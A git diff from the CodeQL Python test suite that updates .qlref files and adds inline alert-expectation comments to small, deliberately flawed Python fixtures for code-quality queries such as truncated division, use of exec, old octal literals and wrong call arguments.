utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Exceptions/generators/test.py b/python/ql/test/2/query-tests/Exceptions/generators/test.py index e8b3f0b2b344..0c5ca29f798a 100644 --- a/python/ql/test/2/query-tests/Exceptions/generators/test.py +++ b/python/ql/test/2/query-tests/Exceptions/generators/test.py @@ -2,12 +2,12 @@ def bad1(it): while True: - yield next(it) + yield next(it) # $ Alert def bad2(seq): it = iter(seq) #Not OK as seq may be empty - raise KeyError(next(it)) + raise KeyError(next(it)) # $ Alert yield 0 def ok1(seq): diff --git a/python/ql/test/2/query-tests/Exceptions/raising/RaisingTuple.qlref b/python/ql/test/2/query-tests/Exceptions/raising/RaisingTuple.qlref index 55d1f5e1d4f9..1cefef85d8a5 100644 --- a/python/ql/test/2/query-tests/Exceptions/raising/RaisingTuple.qlref +++ b/python/ql/test/2/query-tests/Exceptions/raising/RaisingTuple.qlref @@ -1 +1,2 @@ -Exceptions/RaisingTuple.ql +query: Exceptions/RaisingTuple.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Exceptions/raising/test.py b/python/ql/test/2/query-tests/Exceptions/raising/test.py index ff991f642e2f..1e5f3cb35fca 100644 --- a/python/ql/test/2/query-tests/Exceptions/raising/test.py +++ b/python/ql/test/2/query-tests/Exceptions/raising/test.py @@ -5,11 +5,11 @@ def ok(): def bad1(): ex = Exception, "message" - raise ex + raise ex # $ Alert def bad2(): - raise (Exception, "message") + raise (Exception, "message") # $ Alert def bad3(): ex = Exception, - raise ex, "message" + raise ex, "message" # $ Alert diff --git a/python/ql/test/2/query-tests/Expressions/TruncatedDivision.qlref b/python/ql/test/2/query-tests/Expressions/TruncatedDivision.qlref index fa2c2cbf006c..17d539c32260 100644 --- a/python/ql/test/2/query-tests/Expressions/TruncatedDivision.qlref +++ b/python/ql/test/2/query-tests/Expressions/TruncatedDivision.qlref @@ -1 +1,2 @@ -Expressions/TruncatedDivision.ql +query: Expressions/TruncatedDivision.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Expressions/TruncatedDivision_test.py b/python/ql/test/2/query-tests/Expressions/TruncatedDivision_test.py index 6f265b824fb7..64ef262edb81 100644 --- a/python/ql/test/2/query-tests/Expressions/TruncatedDivision_test.py +++ b/python/ql/test/2/query-tests/Expressions/TruncatedDivision_test.py @@ -62,14 +62,14 @@ def halve(x): # This case is bad, and is a minimal obvious case that should be bad. It # SHOULD be found by the query. -print(3 / 2) +print(3 / 2) # $ Alert[py/truncated-division] # This case is bad. It uses indirect returns of integers through function calls # to produce the problem. I -print(return_three() / return_two()) +print(return_three() / return_two()) # $ Alert[py/truncated-division] diff --git a/python/ql/test/2/query-tests/Expressions/UseofApply.py b/python/ql/test/2/query-tests/Expressions/UseofApply.py index 9109636f99ec..6c2255012e6c 100644 --- a/python/ql/test/2/query-tests/Expressions/UseofApply.py +++ b/python/ql/test/2/query-tests/Expressions/UseofApply.py @@ -16,7 +16,7 @@ def foo(): # This use of `apply` is a reference to the builtin function and so SHOULD be # caught by the query. - apply(foo, [1]) + apply(foo, [1]) # $ Alert[py/use-of-apply] diff --git a/python/ql/test/2/query-tests/Expressions/UseofApply.qlref b/python/ql/test/2/query-tests/Expressions/UseofApply.qlref index abf684e3918a..4add79acdb3c 100644 --- a/python/ql/test/2/query-tests/Expressions/UseofApply.qlref +++ b/python/ql/test/2/query-tests/Expressions/UseofApply.qlref @@ -1 +1,2 @@ -Expressions/UseofApply.ql +query: Expressions/UseofApply.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Expressions/UseofInput.qlref b/python/ql/test/2/query-tests/Expressions/UseofInput.qlref index 3f9590f48b2c..2684126de5ee 100644 --- a/python/ql/test/2/query-tests/Expressions/UseofInput.qlref +++ b/python/ql/test/2/query-tests/Expressions/UseofInput.qlref @@ -1 +1,2 @@ -Expressions/UseofInput.ql \ No newline at end of file +query: Expressions/UseofInput.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Expressions/expressions_test.py b/python/ql/test/2/query-tests/Expressions/expressions_test.py index c31681e35353..5d6c1b89904f 100644 --- a/python/ql/test/2/query-tests/Expressions/expressions_test.py +++ b/python/ql/test/2/query-tests/Expressions/expressions_test.py @@ -1,9 +1,9 @@ def use_of_apply(func, args): - apply(func, args) + apply(func, args) # $ Alert[py/use-of-apply] def use_of_input(): - return input() # NOT OK + return input() # NOT OK # $ Alert[py/use-of-input] def not_use_of_input(): diff --git a/python/ql/test/2/query-tests/Functions/DeprecatedSliceMethod.qlref b/python/ql/test/2/query-tests/Functions/DeprecatedSliceMethod.qlref index c38b8d1f7619..3043411c1ce4 100644 --- a/python/ql/test/2/query-tests/Functions/DeprecatedSliceMethod.qlref +++ b/python/ql/test/2/query-tests/Functions/DeprecatedSliceMethod.qlref @@ -1 +1,2 @@ -Functions/DeprecatedSliceMethod.ql \ No newline at end of file +query: Functions/DeprecatedSliceMethod.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Imports/encoding_error/EncodingError.qlref b/python/ql/test/2/query-tests/Imports/encoding_error/EncodingError.qlref index a7e91769ded1..bc78d28db329 100644 --- a/python/ql/test/2/query-tests/Imports/encoding_error/EncodingError.qlref +++ b/python/ql/test/2/query-tests/Imports/encoding_error/EncodingError.qlref @@ -1 +1,2 @@ -Imports/EncodingError.ql +query: Imports/EncodingError.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Imports/syntax_error/EncodingError.qlref b/python/ql/test/2/query-tests/Imports/syntax_error/EncodingError.qlref index e742356f8658..bc78d28db329 100644 --- a/python/ql/test/2/query-tests/Imports/syntax_error/EncodingError.qlref +++ b/python/ql/test/2/query-tests/Imports/syntax_error/EncodingError.qlref @@ -1 +1,2 @@ -Imports/EncodingError.ql \ No newline at end of file +query: Imports/EncodingError.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Imports/syntax_error/SyntaxError.qlref b/python/ql/test/2/query-tests/Imports/syntax_error/SyntaxError.qlref index c143a01fe8b3..5d0698be3de5 100644 --- a/python/ql/test/2/query-tests/Imports/syntax_error/SyntaxError.qlref +++ b/python/ql/test/2/query-tests/Imports/syntax_error/SyntaxError.qlref @@ -1 +1,2 @@ -Imports/SyntaxError.ql \ No newline at end of file +query: Imports/SyntaxError.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Imports/syntax_error/bad_encoding.py b/python/ql/test/2/query-tests/Imports/syntax_error/bad_encoding.py index 9c61b1e1b114..5e3308df0f57 100644 --- a/python/ql/test/2/query-tests/Imports/syntax_error/bad_encoding.py +++ b/python/ql/test/2/query-tests/Imports/syntax_error/bad_encoding.py @@ -8,5 +8,5 @@ # encoding:shift-jis def f(): - print "Python ‚ÌŠJ”­‚ÍA1990 ”N‚²‚ë‚©‚çŠJŽn‚³‚ê‚Ä‚¢‚Ü‚·" + print "Python ‚ÌŠJ”­‚ÍA1990 ”N‚²‚ë‚©‚çŠJŽn‚³‚ê‚Ä‚¢‚Ü‚·" # $ Alert[py/encoding-error] """ diff --git a/python/ql/test/2/query-tests/Imports/syntax_error/nonsense.py b/python/ql/test/2/query-tests/Imports/syntax_error/nonsense.py index e413967af412..f5cd27b313b6 100644 --- a/python/ql/test/2/query-tests/Imports/syntax_error/nonsense.py +++ b/python/ql/test/2/query-tests/Imports/syntax_error/nonsense.py @@ -1,4 +1,4 @@ -`Twas brillig, and the slithy toves +`Twas brillig, and the slithy toves # $ Alert[py/syntax-error] Did gyre and gimble in the wabe: All mimsy were the borogoves, And the mome raths outgrabe. diff --git a/python/ql/test/2/query-tests/Lexical/OldOctalLiteral.qlref b/python/ql/test/2/query-tests/Lexical/OldOctalLiteral.qlref index 40040c873d63..e5b4fdfec578 100644 --- a/python/ql/test/2/query-tests/Lexical/OldOctalLiteral.qlref +++ b/python/ql/test/2/query-tests/Lexical/OldOctalLiteral.qlref @@ -1 +1,2 @@ -Lexical/OldOctalLiteral.ql \ No newline at end of file +query: Lexical/OldOctalLiteral.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Lexical/lexical_test.py b/python/ql/test/2/query-tests/Lexical/lexical_test.py index 4b82b17cc65f..412c24683d19 100644 --- a/python/ql/test/2/query-tests/Lexical/lexical_test.py +++ b/python/ql/test/2/query-tests/Lexical/lexical_test.py @@ -1,6 +1,6 @@ #Bad Octal literal -017 +017 # $ Alert #Good Octal literal 0o17 #Special case file permissions diff --git a/python/ql/test/2/query-tests/Statements/ExecUsed.qlref b/python/ql/test/2/query-tests/Statements/ExecUsed.qlref index ccff89d6815f..286996305ed1 100644 --- a/python/ql/test/2/query-tests/Statements/ExecUsed.qlref +++ b/python/ql/test/2/query-tests/Statements/ExecUsed.qlref @@ -1 +1,2 @@ -Statements/ExecUsed.ql \ No newline at end of file +query: Statements/ExecUsed.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Statements/IterableStringOrSequence.qlref b/python/ql/test/2/query-tests/Statements/IterableStringOrSequence.qlref index e8f1ce1b79ef..c24806ccf305 100644 --- a/python/ql/test/2/query-tests/Statements/IterableStringOrSequence.qlref +++ b/python/ql/test/2/query-tests/Statements/IterableStringOrSequence.qlref @@ -1 +1,2 @@ -Statements/IterableStringOrSequence.ql \ No newline at end of file +query: Statements/IterableStringOrSequence.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Statements/TopLevelPrint.qlref b/python/ql/test/2/query-tests/Statements/TopLevelPrint.qlref index 8271065261d0..e91717901f3d 100644 --- a/python/ql/test/2/query-tests/Statements/TopLevelPrint.qlref +++ b/python/ql/test/2/query-tests/Statements/TopLevelPrint.qlref @@ -1 +1,2 @@ -Statements/TopLevelPrint.ql \ No newline at end of file +query: Statements/TopLevelPrint.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Statements/module.py b/python/ql/test/2/query-tests/Statements/module.py index 0b1f4d26546b..af34eedf0dc3 100644 --- a/python/ql/test/2/query-tests/Statements/module.py +++ b/python/ql/test/2/query-tests/Statements/module.py @@ -1,2 +1,2 @@ #Top level prints in modules are bad -print ("Side effect on import") \ No newline at end of file +print ("Side effect on import") # $ Alert[py/print-during-import] \ No newline at end of file diff --git a/python/ql/test/2/query-tests/Statements/statements_test.py b/python/ql/test/2/query-tests/Statements/statements_test.py index e540608964d2..729b1fd7616e 100644 --- a/python/ql/test/2/query-tests/Statements/statements_test.py +++ b/python/ql/test/2/query-tests/Statements/statements_test.py @@ -2,7 +2,7 @@ def exec_used(val): - exec (val) + exec (val) # $ Alert[py/use-of-exec] #Top level print import module @@ -18,7 +18,7 @@ def f(x): s = u"Hello World" else: s = [ u'Hello', u'World'] - for thing in s: + for thing in s: # $ Alert[py/iteration-string-and-sequence] print (thing) import fake_six diff --git a/python/ql/test/2/query-tests/Summary/LinesOfCode.qlref b/python/ql/test/2/query-tests/Summary/LinesOfCode.qlref index b60eb7917224..d22b10044239 100644 --- a/python/ql/test/2/query-tests/Summary/LinesOfCode.qlref +++ b/python/ql/test/2/query-tests/Summary/LinesOfCode.qlref @@ -1 +1 @@ -Summary/LinesOfCode.ql +query: Summary/LinesOfCode.ql diff --git a/python/ql/test/2/query-tests/Summary/LinesOfUserCode.qlref b/python/ql/test/2/query-tests/Summary/LinesOfUserCode.qlref index baaa947e6afa..99a6d1324943 100644 --- a/python/ql/test/2/query-tests/Summary/LinesOfUserCode.qlref +++ b/python/ql/test/2/query-tests/Summary/LinesOfUserCode.qlref @@ -1 +1 @@ -Summary/LinesOfUserCode.ql +query: Summary/LinesOfUserCode.ql diff --git a/python/ql/test/2/query-tests/Variables/LeakyComp/LeakyComp.qlref b/python/ql/test/2/query-tests/Variables/LeakyComp/LeakyComp.qlref index 0f6dd50a2814..6b4ece7f1273 100644 --- a/python/ql/test/2/query-tests/Variables/LeakyComp/LeakyComp.qlref +++ b/python/ql/test/2/query-tests/Variables/LeakyComp/LeakyComp.qlref @@ -1 +1,2 @@ -Variables/LeakingListComprehension.ql \ No newline at end of file +query: Variables/LeakingListComprehension.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Variables/LeakyComp/test.py b/python/ql/test/2/query-tests/Variables/LeakyComp/test.py index 0cd6a0d25202..bbb5d33328f8 100644 --- a/python/ql/test/2/query-tests/Variables/LeakyComp/test.py +++ b/python/ql/test/2/query-tests/Variables/LeakyComp/test.py @@ -2,12 +2,12 @@ def undefined_in_3(): [x for x in range(3)] - print(x) + print(x) # $ Alert def different_in_3(): y = 10 [y for y in range(3)] - print(y) + print(y) # $ Alert def ok(): [z for z in range(4)] diff --git a/python/ql/test/2/query-tests/Variables/undefined/UndefinedExport.py b/python/ql/test/2/query-tests/Variables/undefined/UndefinedExport.py index d7ec86a22560..847d0ce4f8ef 100644 --- a/python/ql/test/2/query-tests/Variables/undefined/UndefinedExport.py +++ b/python/ql/test/2/query-tests/Variables/undefined/UndefinedExport.py @@ -1,6 +1,6 @@ -__all__ = [ "x", "y", "z", "module" ] +__all__ = [ "x", "y", "z", "module" ] # $ Alert[py/undefined-export] x = 1 if 0: diff --git a/python/ql/test/2/query-tests/Variables/undefined/UndefinedExport.qlref b/python/ql/test/2/query-tests/Variables/undefined/UndefinedExport.qlref index 3e5d31e47488..d964148077e5 100644 --- a/python/ql/test/2/query-tests/Variables/undefined/UndefinedExport.qlref +++ b/python/ql/test/2/query-tests/Variables/undefined/UndefinedExport.qlref @@ -1 +1,2 @@ -Variables/UndefinedExport.ql +query: Variables/UndefinedExport.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Variables/undefined/UndefinedGlobal.qlref b/python/ql/test/2/query-tests/Variables/undefined/UndefinedGlobal.qlref index ea9f5a038426..e69631e746b9 100644 --- a/python/ql/test/2/query-tests/Variables/undefined/UndefinedGlobal.qlref +++ b/python/ql/test/2/query-tests/Variables/undefined/UndefinedGlobal.qlref @@ -1 +1,2 @@ -Variables/UndefinedGlobal.ql +query: Variables/UndefinedGlobal.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Variables/undefined/UninitializedLocal.qlref b/python/ql/test/2/query-tests/Variables/undefined/UninitializedLocal.qlref index f2d0e603554a..90233ce61888 100644 --- a/python/ql/test/2/query-tests/Variables/undefined/UninitializedLocal.qlref +++ b/python/ql/test/2/query-tests/Variables/undefined/UninitializedLocal.qlref @@ -1 +1,2 @@ -Variables/UninitializedLocal.ql +query: Variables/UninitializedLocal.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/2/query-tests/Variables/undefined/package/__init__.py b/python/ql/test/2/query-tests/Variables/undefined/package/__init__.py index 85f1f2ac24f4..d0f80d5e8909 100644 --- a/python/ql/test/2/query-tests/Variables/undefined/package/__init__.py +++ b/python/ql/test/2/query-tests/Variables/undefined/package/__init__.py @@ -1 +1 @@ -__all__ = [ "module", "not_exists" ] \ No newline at end of file +__all__ = [ "module", "not_exists" ] # $ Alert[py/undefined-export] \ No newline at end of file diff --git a/python/ql/test/3/query-tests/Classes/equals-attr/DefineEqualsWhenAddingAttributes.qlref b/python/ql/test/3/query-tests/Classes/equals-attr/DefineEqualsWhenAddingAttributes.qlref index e542a6176ad4..f3385f506bf2 100644 --- a/python/ql/test/3/query-tests/Classes/equals-attr/DefineEqualsWhenAddingAttributes.qlref +++ b/python/ql/test/3/query-tests/Classes/equals-attr/DefineEqualsWhenAddingAttributes.qlref @@ -1 +1,2 @@ -Classes/DefineEqualsWhenAddingAttributes.ql \ No newline at end of file +query: Classes/DefineEqualsWhenAddingAttributes.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/3/query-tests/Classes/equals-attr/test.py b/python/ql/test/3/query-tests/Classes/equals-attr/test.py index 0ab18d0ad434..b6f3e0eb3be3 100644 --- a/python/ql/test/3/query-tests/Classes/equals-attr/test.py +++ b/python/ql/test/3/query-tests/Classes/equals-attr/test.py @@ -9,7 +9,7 @@ class RedefineEquals: def __eq__(self, other): return other is "Tuesday" -class C(RedefineEquals): +class C(RedefineEquals): # $ Alert def __init__(self, args): self.a, self.b = args diff --git a/python/ql/test/3/query-tests/Classes/inconsistent-mro/InconsistentMRO.qlref b/python/ql/test/3/query-tests/Classes/inconsistent-mro/InconsistentMRO.qlref index f43176f3d7a8..e2e9a180ab1c 100644 --- a/python/ql/test/3/query-tests/Classes/inconsistent-mro/InconsistentMRO.qlref +++ b/python/ql/test/3/query-tests/Classes/inconsistent-mro/InconsistentMRO.qlref @@ -1 +1,2 @@ -Classes/InconsistentMRO.ql \ No newline at end of file +query: Classes/InconsistentMRO.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/3/query-tests/Classes/inconsistent-mro/inconsistent_mro.py b/python/ql/test/3/query-tests/Classes/inconsistent-mro/inconsistent_mro.py index 346778648349..9cb04f1df97c 100644 --- a/python/ql/test/3/query-tests/Classes/inconsistent-mro/inconsistent_mro.py +++ b/python/ql/test/3/query-tests/Classes/inconsistent-mro/inconsistent_mro.py @@ -6,12 +6,12 @@ class X(object): class Y(X): pass -class Z(X, Y): +class Z(X, Y): # $ Alert pass class O: pass #This is OK in Python 2 -class N(object, O): +class N(object, O): # $ Alert pass \ No newline at end of file diff --git a/python/ql/test/3/query-tests/Classes/undefined-attribute/MaybeUndefinedClassAttribute.qlref b/python/ql/test/3/query-tests/Classes/undefined-attribute/MaybeUndefinedClassAttribute.qlref index d4986ffc84ce..35f6da7add55 100644 --- a/python/ql/test/3/query-tests/Classes/undefined-attribute/MaybeUndefinedClassAttribute.qlref +++ b/python/ql/test/3/query-tests/Classes/undefined-attribute/MaybeUndefinedClassAttribute.qlref @@ -1 +1,2 @@ -Classes/MaybeUndefinedClassAttribute.ql +query: Classes/MaybeUndefinedClassAttribute.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/3/query-tests/Classes/undefined-attribute/UndefinedClassAttribute.qlref b/python/ql/test/3/query-tests/Classes/undefined-attribute/UndefinedClassAttribute.qlref index 7ac0a3b18b77..f0e8fb722784 100644 --- a/python/ql/test/3/query-tests/Classes/undefined-attribute/UndefinedClassAttribute.qlref +++ b/python/ql/test/3/query-tests/Classes/undefined-attribute/UndefinedClassAttribute.qlref @@ -1 +1,2 @@ -Classes/UndefinedClassAttribute.ql +query: Classes/UndefinedClassAttribute.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/3/query-tests/Expressions/Arguments/WrongNameForArgumentInCall.qlref b/python/ql/test/3/query-tests/Expressions/Arguments/WrongNameForArgumentInCall.qlref index 3599f204f55e..c6b6ca3d30fa 100644 --- a/python/ql/test/3/query-tests/Expressions/Arguments/WrongNameForArgumentInCall.qlref +++ b/python/ql/test/3/query-tests/Expressions/Arguments/WrongNameForArgumentInCall.qlref @@ -1 +1,2 @@ -Expressions/WrongNameForArgumentInCall.ql \ No newline at end of file +query: Expressions/WrongNameForArgumentInCall.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/3/query-tests/Expressions/Arguments/WrongNumberArgumentsInCall.qlref b/python/ql/test/3/query-tests/Expressions/Arguments/WrongNumberArgumentsInCall.qlref index 1bffe8f1cad4..68dc510d5c6e 100644 --- a/python/ql/test/3/query-tests/Expressions/Arguments/WrongNumberArgumentsInCall.qlref +++ b/python/ql/test/3/query-tests/Expressions/Arguments/WrongNumberArgumentsInCall.qlref @@ -1 +1,2 @@ -Expressions/WrongNumberArgumentsInCall.ql \ No newline at end of file +query: Expressions/WrongNumberArgumentsInCall.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/3/query-tests/Expressions/Arguments/wrong_arguments.py b/python/ql/test/3/query-tests/Expressions/Arguments/wrong_arguments.py index 729177ea0b43..1242af144b61 100644 --- a/python/ql/test/3/query-tests/Expressions/Arguments/wrong_arguments.py +++ b/python/ql/test/3/query-tests/Expressions/Arguments/wrong_arguments.py @@ -9,8 +9,8 @@ def f(a, *varargs, kw1, kw2="has-default"): f(1, 2, kw1=1, kw2=2) #Not OK -f(1, 2, 3, kw1=1, kw3=3) -f(1, 2, 3, kw3=3) +f(1, 2, 3, kw1=1, kw3=3) # $ Alert[py/call/wrong-named-argument] +f(1, 2, 3, kw3=3) # $ Alert[py/call/wrong-named-argument] #ODASA-5897 @@ -21,4 +21,4 @@ def ok(): return analyze_member_access(msg, original=original, chk=chk) def bad(): - return analyze_member_access(msg, original, chk=chk) + return analyze_member_access(msg, original, chk=chk) # $ Alert[py/call/wrong-arguments] diff --git a/python/ql/test/3/query-tests/Expressions/Formatting/WrongNumberArgumentsForFormat.qlref b/python/ql/test/3/query-tests/Expressions/Formatting/WrongNumberArgumentsForFormat.qlref index 0d127e1b618b..744334a6aeb1 100644 --- a/python/ql/test/3/query-tests/Expressions/Formatting/WrongNumberArgumentsForFormat.qlref +++ b/python/ql/test/3/query-tests/Expressions/Formatting/WrongNumberArgumentsForFormat.qlref @@ -1 +1,2 @@ -Expressions/WrongNumberArgumentsForFormat.ql \ No newline at end of file +query: Expressions/WrongNumberArgumentsForFormat.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/3/query-tests/Expressions/TruncatedDivision/TruncatedDivision.qlref b/python/ql/test/3/query-tests/Expressions/TruncatedDivision/TruncatedDivision.qlref index fa2c2cbf006c..17d539c32260 100644 --- a/python/ql/test/3/query-tests/Expressions/TruncatedDivision/TruncatedDivision.qlref +++ b/python/ql/test/3/query-tests/Expressions/TruncatedDivision/TruncatedDivision.qlref @@ -1 +1,2 @@ -Expressions/TruncatedDivision.ql +query: Expressions/TruncatedDivision.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/3/query-tests/Expressions/UseofApply/UseofApply.qlref b/python/ql/test/3/query-tests/Expressions/UseofApply/UseofApply.qlref index abf684e3918a..4add79acdb3c 100644 --- a/python/ql/test/3/query-tests/Expressions/UseofApply/UseofApply.qlref +++ b/python/ql/test/3/query-tests/Expressions/UseofApply/UseofApply.qlref @@ -1 +1,2 @@ -Expressions/UseofApply.ql +query: Expressions/UseofApply.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/3/query-tests/Imports/encoding_error/EncodingError.qlref b/python/ql/test/3/query-tests/Imports/encoding_error/EncodingError.qlref index a7e91769ded1..bc78d28db329 100644 --- a/python/ql/test/3/query-tests/Imports/encoding_error/EncodingError.qlref +++ b/python/ql/test/3/query-tests/Imports/encoding_error/EncodingError.qlref @@ -1 +1,2 @@ -Imports/EncodingError.ql +query: Imports/EncodingError.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/3/query-tests/Imports/syntax_error/EncodingError.qlref b/python/ql/test/3/query-tests/Imports/syntax_error/EncodingError.qlref index e742356f8658..bc78d28db329 100644 --- a/python/ql/test/3/query-tests/Imports/syntax_error/EncodingError.qlref +++ b/python/ql/test/3/query-tests/Imports/syntax_error/EncodingError.qlref @@ -1 +1,2 @@ -Imports/EncodingError.ql \ No newline at end of file +query: Imports/EncodingError.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/3/query-tests/Imports/syntax_error/SyntaxError.qlref b/python/ql/test/3/query-tests/Imports/syntax_error/SyntaxError.qlref index c143a01fe8b3..5d0698be3de5 100644 --- a/python/ql/test/3/query-tests/Imports/syntax_error/SyntaxError.qlref +++ b/python/ql/test/3/query-tests/Imports/syntax_error/SyntaxError.qlref @@ -1 +1,2 @@ -Imports/SyntaxError.ql \ No newline at end of file +query: Imports/SyntaxError.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/3/query-tests/Imports/syntax_error/bad_encoding.py b/python/ql/test/3/query-tests/Imports/syntax_error/bad_encoding.py index 9c61b1e1b114..5e3308df0f57 100644 --- a/python/ql/test/3/query-tests/Imports/syntax_error/bad_encoding.py +++ b/python/ql/test/3/query-tests/Imports/syntax_error/bad_encoding.py @@ -8,5 +8,5 @@ # encoding:shift-jis def f(): - print "Python ‚ÌŠJ”­‚ÍA1990 ”N‚²‚ë‚©‚çŠJŽn‚³‚ê‚Ä‚¢‚Ü‚·" + print "Python ‚ÌŠJ”­‚ÍA1990 ”N‚²‚ë‚©‚çŠJŽn‚³‚ê‚Ä‚¢‚Ü‚·" # $ Alert[py/encoding-error] """ diff --git a/python/ql/test/3/query-tests/Imports/syntax_error/nonsense.py b/python/ql/test/3/query-tests/Imports/syntax_error/nonsense.py index 66cdd526fbab..e0819afbc5ee 100644 --- a/python/ql/test/3/query-tests/Imports/syntax_error/nonsense.py +++ b/python/ql/test/3/query-tests/Imports/syntax_error/nonsense.py @@ -1,4 +1,4 @@ - `Twas brillig, and the slithy toves + `Twas brillig, and the slithy toves # $ Alert[py/syntax-error] Did gyre and gimble in the wabe: All mimsy were the borogoves, And the mome raths outgrabe. diff --git a/python/ql/test/3/query-tests/Statements/general/ExecUsed.qlref b/python/ql/test/3/query-tests/Statements/general/ExecUsed.qlref index ccff89d6815f..286996305ed1 100644 --- a/python/ql/test/3/query-tests/Statements/general/ExecUsed.qlref +++ b/python/ql/test/3/query-tests/Statements/general/ExecUsed.qlref @@ -1 +1,2 @@ -Statements/ExecUsed.ql \ No newline at end of file +query: Statements/ExecUsed.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/3/query-tests/Statements/general/TopLevelPrint.qlref b/python/ql/test/3/query-tests/Statements/general/TopLevelPrint.qlref index 8271065261d0..e91717901f3d 100644 --- a/python/ql/test/3/query-tests/Statements/general/TopLevelPrint.qlref +++ b/python/ql/test/3/query-tests/Statements/general/TopLevelPrint.qlref @@ -1 +1,2 @@ -Statements/TopLevelPrint.ql \ No newline at end of file +query: Statements/TopLevelPrint.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/3/query-tests/Statements/general/module.py b/python/ql/test/3/query-tests/Statements/general/module.py index 0b1f4d26546b..af34eedf0dc3 100644 --- a/python/ql/test/3/query-tests/Statements/general/module.py +++ b/python/ql/test/3/query-tests/Statements/general/module.py @@ -1,2 +1,2 @@ #Top level prints in modules are bad -print ("Side effect on import") \ No newline at end of file +print ("Side effect on import") # $ Alert[py/print-during-import] \ No newline at end of file diff --git a/python/ql/test/3/query-tests/Statements/general/statements_test.py b/python/ql/test/3/query-tests/Statements/general/statements_test.py index 2baee458c04c..a4414a40f80c 100644 --- a/python/ql/test/3/query-tests/Statements/general/statements_test.py +++ b/python/ql/test/3/query-tests/Statements/general/statements_test.py @@ -2,7 +2,7 @@ def exec_used(val): - exec(val) + exec(val) # $ Alert[py/use-of-exec] #Top level print import module diff --git a/python/ql/test/3/query-tests/Statements/iter/IterableStringOrSequence.qlref b/python/ql/test/3/query-tests/Statements/iter/IterableStringOrSequence.qlref index e8f1ce1b79ef..c24806ccf305 100644 --- a/python/ql/test/3/query-tests/Statements/iter/IterableStringOrSequence.qlref +++ b/python/ql/test/3/query-tests/Statements/iter/IterableStringOrSequence.qlref @@ -1 +1,2 @@ -Statements/IterableStringOrSequence.ql \ No newline at end of file +query: Statements/IterableStringOrSequence.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/3/query-tests/Statements/iter/NonIteratorInForLoop.qlref b/python/ql/test/3/query-tests/Statements/iter/NonIteratorInForLoop.qlref index fb09cace29a8..b7697d64d8fa 100644 --- a/python/ql/test/3/query-tests/Statements/iter/NonIteratorInForLoop.qlref +++ b/python/ql/test/3/query-tests/Statements/iter/NonIteratorInForLoop.qlref @@ -1 +1,2 @@ -Statements/NonIteratorInForLoop.ql \ No newline at end of file +query: Statements/NonIteratorInForLoop.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/3/query-tests/Statements/iter/async_iterator.py b/python/ql/test/3/query-tests/Statements/iter/async_iterator.py index fdde931eace9..76972058a02a 100644 --- a/python/ql/test/3/query-tests/Statements/iter/async_iterator.py +++ b/python/ql/test/3/query-tests/Statements/iter/async_iterator.py @@ -23,5 +23,5 @@ async def good(): yield x async def bad(): - async for x in MissingAiter(): + async for x in MissingAiter(): # $ Alert[py/non-iterable-in-for-loop] yield x diff --git a/python/ql/test/3/query-tests/Statements/iter/statements_test.py b/python/ql/test/3/query-tests/Statements/iter/statements_test.py index 33b3f4aae5c5..daf811f3f83d 100644 --- a/python/ql/test/3/query-tests/Statements/iter/statements_test.py +++ b/python/ql/test/3/query-tests/Statements/iter/statements_test.py @@ -18,7 +18,7 @@ def f(x): s = u"Hello World" else: s = [ u'Hello', u'World'] - for thing in s: + for thing in s: # $ Alert[py/iteration-string-and-sequence] print (thing) @@ -31,7 +31,7 @@ class Color(Enum): def colors(): for color in Color: print(color) - for color in 1: + for color in 1: # $ Alert[py/non-iterable-in-for-loop] print(color) colors() diff --git a/python/ql/test/3/query-tests/Statements/unreachable/UnreachableCode.qlref b/python/ql/test/3/query-tests/Statements/unreachable/UnreachableCode.qlref index 5b7891f0026a..b95a67d24949 100644 --- a/python/ql/test/3/query-tests/Statements/unreachable/UnreachableCode.qlref +++ b/python/ql/test/3/query-tests/Statements/unreachable/UnreachableCode.qlref @@ -1 +1,2 @@ 